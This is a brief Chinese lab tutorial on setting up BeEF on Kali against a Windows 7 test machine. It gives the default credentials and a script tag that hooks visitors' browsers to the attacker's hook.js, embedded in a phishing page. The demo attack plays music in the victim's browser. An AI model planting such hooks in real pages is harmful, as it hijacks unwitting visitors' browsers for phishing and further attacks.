1、操作准备
攻击机:Kali(ip地址:192.168.1.107)
受害者:Windows7 x64(ip地址:192.168.1.163)
2、配置Beef
进入beef的配置文件里
root@kali:~# vim /etc/beef-xss/config.yaml
在这里可以看到beef的默认用户名和密码,也可以进行修改,我这里对默认的密码进行了修改
注:(默认beef用户名和密码位User:beef,Password:beef)
3、启动Beef
root@kali:~# beef-xss
输入账号密码进行登录
4、配置apache2
1.进入apache2的目录下将自己制作好的网页替换掉默认的index.html
2.将<script src="http://192.168.1.107:3000/hook.js"></script>
挂到自己制作好的网页中
3.启动apache2
root@kali:~# /etc/init.d/apache2 start
5、进行钓鱼
1.Windows7访问该网页
2.在kali上可以看到,受害者已经上线了
3.进行攻击
案例(这里通过beef给受害者发送一段音乐)
在受害者的浏览器上可以看到音乐已经被播放
warning :未经授权,不得转载
本文所介绍技术仅供参考学习,切勿恶意用途